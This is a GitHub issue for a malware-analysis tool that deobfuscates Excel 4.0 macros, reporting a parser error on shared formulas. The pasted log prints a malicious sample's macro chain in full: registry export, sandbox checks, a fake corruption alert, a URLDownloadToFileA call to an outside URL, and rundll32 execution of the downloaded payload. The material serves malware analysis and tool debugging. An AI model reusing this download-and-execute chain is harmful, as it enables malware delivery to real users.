search

DissectMalware / XLMMacroDeobfuscator

Extract and Deobfuscate XLM macros (a.k.a Excel 4.0 Macros)
Apache License 2.0
568 stars 116 forks source link

Error [deobfuscator.py:2433.... #77

Open JA1E0 opened 3 years ago

JA1E0 commented 3 years ago

When analyzing a malicious document with version 0.1.4, analysis proceeds until...

XLMMacroDeobfuscator(v0.1.7) - https://github.com/DissectMalware/XLMMacroDeobfuscator

File: sample2-b5d469a07709b5ca6fee934b1e5e8e38.bin

Unencrypted xls file

[Loading Cells] SHRFMLA (sub): 0 0 1 8 6 SHRFMLA (sub): 9 9 1 8 8 SHRFMLA (sub): 19 19 1 7 7 SHRFMLA (sub): 26 26 0 7 8 auto_open: auto_open->'CSHykdYHvi'!$J$727 [Starting Deobfuscation] CELL:J727 , FullEvaluation , CALL("Shell32","ShellExecuteA","JJCCCJJ",0,"open","C:\Windows\system32\reg.exe","EXPORT HKCU\Software\Microsoft\Office\GET.WORKSPACE(2)\Excel\Security c:\users\public\1.reg /y",0,5) CELL:J728 , PartialEvaluation , =WAIT("2021-02-20 14:47:40.575765") CELL:J729 , FullEvaluation , FOPEN("c:\users\public\1.reg",1) CELL:J730 , PartialEvaluation , =FPOS(FOPEN("c:\users\public\1.reg",1),215) CELL:J732 , PartialEvaluation , =FCLOSE(FOPEN("c:\users\public\1.reg",1)) CELL:J733 , PartialEvaluation , =FILE.DELETE("c:\users\public\1.reg") CELL:J734 , Branching , IF(ISNUMBER(SEARCH("0001",J731)),CLOSE(FALSE),GOTO(J1)) CELL:J734 , FullEvaluation , [FALSE] GOTO(J1) CELL:J1 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(13)<770, CLOSE(FALSE),)",K2) CELL:J2 , FullEvaluation , FORMULA("=IF(GET.WORKSPACE(14)<381, CLOSE(FALSE),)",K4) CELL:J4 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(19),,CLOSE(TRUE))",K5) CELL:J5 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(GET.WORKSPACE(42),,CLOSE(TRUE))",K6) CELL:J6 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1IF(ISNUMBER(SEARCH(""Windows"",GET.WORKSPACE(1))), ,CLOSE(TRUE))",K7) CELL:J7 , FullEvaluation , FORMULA("=CALL(""urlmon"",""URLDownloadToFileA"",""JJCCJJ"",0,""https://ethelenecrace.xyz/fbb3"",""c:\Users\Public\bmjn5ef.html"",0,0)",K8) CELL:J8 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1ALERT(""The workbook cannot be opened or repaired by Microsoft Excel because it's corrupt."",2)",K9) CELL:J9 , FullEvaluation , FORMULA("=CALL(""Shell32"",""ShellExecuteA"",""JJCCCJJ"",0,""open"",""C:\Windows\system32\rundll32.exe"",""c:\Users\Public\bmjn5ef.html,DllRegisterServer"",0,5)",K11) CELL:J11 , FullEvaluation , FORMULA("=SHARED FMLA at rowx=0 colx=1CLOSE(FALSE)",K12) CELL:J12 , PartialEvaluation , =WORKBOOK.HIDE("CSHykdYHvi",TRUE) CELL:J13 , FullEvaluation , GOTO(K2) CELL:K2 , FullEvaluation , IF(GET.WORKSPACE(13)<770,CLOSE(FALSE),) CELL:K4 , FullEvaluation , IF(GET.WORKSPACE(14)<381,CLOSE(FALSE),) Error [deobfuscator.py:2433 parse_tree = self.xlm_parser.parse(formula)]: Unexpected token Token('NAME', 'FMLA') at line 1, column 9. Expected one of:

Files:

[END of Deobfuscation] time elapsed: 0.1893155574798584

sample MD5: b5d469a07709b5ca6fee934b1e5e8e38

DissectMalware commented 3 years ago

Seems a problem in xlrd2 parser (xls). It doesn't support parsing shared formula. Will test soon.

https://docs.microsoft.com/en-us/openspecs/office_file_formats/ms-xls/984826cc-8bb7-412b-9907-7bbb9b08b4ad